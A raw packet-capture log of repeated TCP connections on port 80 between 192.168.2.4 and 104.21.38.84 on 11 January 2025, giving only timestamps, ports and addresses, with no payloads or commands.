                                                                                Jan 11, 2025 23:34:02.895603895 CET5009580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:02.970678091 CET5009580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:02.971155882 CET5009680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:02.975919008 CET8050095104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:02.975985050 CET5009580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:02.976087093 CET8050096104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:02.976165056 CET5009680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:02.976263046 CET5009680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:02.981098890 CET8050096104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:03.333043098 CET5009680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:03.338247061 CET8050096104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:03.338284969 CET8050096104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:03.338313103 CET8050096104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:03.431459904 CET8050096104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:03.473630905 CET5009680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:03.666830063 CET8050096104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:03.723526001 CET5009680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:03.781063080 CET5009680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:03.781275034 CET5009780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:03.786288023 CET8050097104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:03.786562920 CET8050096104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:03.786658049 CET5009680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:03.786720037 CET5009780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:03.786720037 CET5009780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:03.791572094 CET8050097104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.145536900 CET5009780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:04.150698900 CET8050097104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.150737047 CET8050097104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.150764942 CET8050097104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.233973980 CET8050097104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.286012888 CET5009780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:04.395659924 CET8050097104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.442310095 CET5009780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:04.518004894 CET5009780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:04.518520117 CET5009880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:04.523585081 CET8050097104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.523627996 CET8050098104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.523646116 CET5009780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:04.523704052 CET5009880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:04.523776054 CET5009880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:04.528657913 CET8050098104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.879851103 CET5009880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:04.885054111 CET8050098104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.885102034 CET8050098104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.885130882 CET8050098104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:04.987528086 CET8050098104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:05.036137104 CET5009880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:05.222903967 CET8050098104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:05.270541906 CET5009880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:05.344968081 CET5009880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:05.345181942 CET5009980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:05.350326061 CET8050098104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:05.350368023 CET8050099104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:05.350411892 CET5009880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:05.350447893 CET5009980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:05.350532055 CET5009980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:05.355433941 CET8050099104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:05.707966089 CET5009980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:05.713562965 CET8050099104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:05.713599920 CET8050099104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:05.713637114 CET8050099104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:05.822393894 CET8050099104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:05.864132881 CET5009980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.058305025 CET8050099104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.098602057 CET5009980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.173274994 CET5009980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.173830986 CET5010080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.178677082 CET8050099104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.178764105 CET5009980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.178859949 CET8050100104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.178944111 CET5010080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.179019928 CET5010080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.183796883 CET8050100104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.536218882 CET5010080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.541450977 CET8050100104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.541486025 CET8050100104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.541577101 CET8050100104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.635458946 CET8050100104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.676656008 CET5010080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.755979061 CET5010180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.756011009 CET5010080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.761347055 CET8050101104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.761440039 CET5010180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.761509895 CET8050100104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.761527061 CET5010180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.761574030 CET5010080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.766518116 CET8050101104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.875504971 CET5010280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.880780935 CET8050102104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:06.880975008 CET5010280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.880975008 CET5010280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:06.885898113 CET8050102104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.114298105 CET5010180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.119617939 CET8050101104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.119657040 CET8050101104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.207566977 CET8050101104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.239319086 CET5010280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.244774103 CET8050102104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.244808912 CET8050102104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.244837999 CET8050102104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.254868031 CET5010180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.326798916 CET8050102104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.379885912 CET5010280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.456801891 CET8050101104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.504862070 CET5010180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.598644972 CET8050102104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.645541906 CET5010280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.721473932 CET5010280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.721499920 CET5010180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.722836018 CET5010380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.726780891 CET8050102104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.726850986 CET5010280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.727106094 CET8050101104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.727165937 CET5010180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.727720976 CET8050103104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:07.727801085 CET5010380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.727901936 CET5010380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:07.732709885 CET8050103104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.083079100 CET5010380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:08.088598013 CET8050103104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.088634968 CET8050103104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.088666916 CET8050103104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.191127062 CET8050103104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.239238024 CET5010380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:08.360094070 CET8050103104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.411134005 CET5010380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:08.450448036 CET8050103104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.504898071 CET5010380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:08.562521935 CET5010380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:08.563054085 CET5010480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:08.568022013 CET8050103104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.568120003 CET5010380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:08.568135023 CET8050104104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.568218946 CET5010480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:08.568300962 CET5010480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:08.573297977 CET8050104104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.926882029 CET5010480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:08.932024956 CET8050104104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.932056904 CET8050104104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:08.932089090 CET8050104104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:09.020927906 CET8050104104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:09.067289114 CET5010480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:09.208379984 CET8050104104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:09.254925013 CET5010480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:09.329643011 CET5010480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:09.330157995 CET5010580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:09.334789991 CET8050104104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:09.334969997 CET5010480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:09.335036993 CET8050105104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:09.335114002 CET5010580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:09.335218906 CET5010580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:09.339979887 CET8050105104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:09.692363977 CET5010580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:09.698431015 CET8050105104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:09.698463917 CET8050105104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:09.698492050 CET8050105104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:09.779334068 CET8050105104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:09.832901955 CET5010580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.019345045 CET8050105104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:10.067269087 CET5010580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.141998053 CET5010680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.146975994 CET8050106104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:10.147073030 CET5010680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.147157907 CET5010680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.152034044 CET8050106104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:10.505021095 CET5010680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.510154009 CET8050106104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:10.510191917 CET8050106104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:10.510220051 CET8050106104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:10.588177919 CET8050106104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:10.629793882 CET5010680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.867408037 CET8050106104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:10.911165953 CET5010680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.984736919 CET5010680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.984913111 CET5010780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.989824057 CET8050107104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:10.989918947 CET5010780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.990196943 CET8050106104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:10.990294933 CET5010680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.990305901 CET5010780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:10.995187998 CET8050107104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:11.349616051 CET5010780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:11.354618073 CET8050107104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:11.354657888 CET8050107104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:11.354685068 CET8050107104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:11.461920023 CET8050107104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:11.504801989 CET5010780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:11.700800896 CET8050107104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:11.755136013 CET5010780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:11.793082952 CET8050107104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:11.832896948 CET5010780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:11.907475948 CET5010780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:11.907908916 CET5010880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:11.914990902 CET8050107104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:11.915050983 CET5010780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:11.915146112 CET8050108104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:11.915242910 CET5010880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:11.915344954 CET5010880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:11.923146963 CET8050108104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.270737886 CET5010880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.275729895 CET8050108104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.275768042 CET8050108104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.275796890 CET8050108104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.372884035 CET8050108104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.426775932 CET5010880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.458889961 CET5010980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.459064007 CET5010880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.463789940 CET8050109104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.463855982 CET5010980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.463926077 CET5010980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.464050055 CET8050108104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.464106083 CET5010880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.468749046 CET8050109104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.581111908 CET5010580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.581367016 CET5011080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.586209059 CET8050110104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.586292982 CET5011080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.586476088 CET5011080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.591303110 CET8050110104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.817418098 CET5010980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.822273970 CET8050109104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.822448969 CET8050109104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.917025089 CET8050109104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.942348003 CET5011080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:12.947305918 CET8050110104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.947350025 CET8050110104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.947377920 CET8050110104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:12.957887888 CET5010980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:13.055335045 CET8050110104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:13.074856997 CET8050109104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:13.098540068 CET5011080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:13.129770041 CET5010980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:13.289153099 CET8050110104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:13.332918882 CET5011080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:13.410697937 CET5010980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:13.411405087 CET5011180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:13.411415100 CET5011080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:13.415849924 CET8050109104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:13.415913105 CET5010980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:13.416502953 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:13.416560888 CET5011180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:13.416649103 CET5011180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:13.416723013 CET8050110104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:13.416774035 CET5011080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:13.421397924 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:13.770452976 CET5011180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:14.082942009 CET5011180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:14.671246052 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:14.671380997 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:14.671435118 CET5011180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:14.671648979 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:14.671703100 CET5011180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:14.672601938 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:14.672661066 CET5011180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:14.673116922 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:14.673428059 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:14.673455954 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:14.676619053 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:14.677650928 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:14.677683115 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:15.039063931 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:15.082915068 CET5011180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:15.157874107 CET5011180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:15.158580065 CET5011280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:15.163619995 CET8050112104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:15.163702011 CET5011280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:15.163779020 CET5011280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:15.166176081 CET8050111104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:15.166227102 CET5011180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:15.168592930 CET8050112104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:15.520488977 CET5011280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:15.525362968 CET8050112104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:15.525378942 CET8050112104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:15.525389910 CET8050112104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:15.611347914 CET8050112104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:15.661087036 CET5011280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:15.876904011 CET8050112104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:15.926660061 CET5011280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.003958941 CET5011380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.009421110 CET8050113104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:16.009613037 CET5011380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.009757996 CET5011380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.015027046 CET8050113104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:16.364222050 CET5011380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.369740963 CET8050113104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:16.369775057 CET8050113104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:16.369806051 CET8050113104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:16.477673054 CET8050113104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:16.520401001 CET5011380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.639544010 CET8050113104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:16.692280054 CET5011380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.756511927 CET5011280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.765343904 CET5011380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.765826941 CET5011480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.770694971 CET8050113104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:16.770730972 CET8050114104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:16.770766973 CET5011380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.770817041 CET5011480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.770922899 CET5011480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:16.775810957 CET8050114104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:17.129864931 CET5011480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:17.134809017 CET8050114104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:17.134844065 CET8050114104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:17.134871960 CET8050114104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:17.224318027 CET8050114104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:17.270386934 CET5011480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:17.462191105 CET8050114104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:17.504772902 CET5011480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:17.577965975 CET5011480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:17.578186989 CET5011580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:17.583096981 CET8050115104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:17.583190918 CET5011580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:17.583234072 CET8050114104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:17.583266973 CET5011580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:17.583281994 CET5011480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:17.588109970 CET8050115104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:17.942392111 CET5011580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:17.947509050 CET8050115104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:17.947546005 CET8050115104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:17.947626114 CET8050115104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:18.037406921 CET8050115104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:18.082931042 CET5011580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:18.084009886 CET5011680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:18.084248066 CET5011580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:18.089318991 CET8050116104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:18.089399099 CET5011680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:18.089493990 CET5011680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:18.089574099 CET8050115104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:18.089637995 CET5011580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:18.094480038 CET8050116104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:18.204210043 CET5011780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:18.209182978 CET8050117104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:18.209271908 CET5011780192.168.2.4104.21.38.84
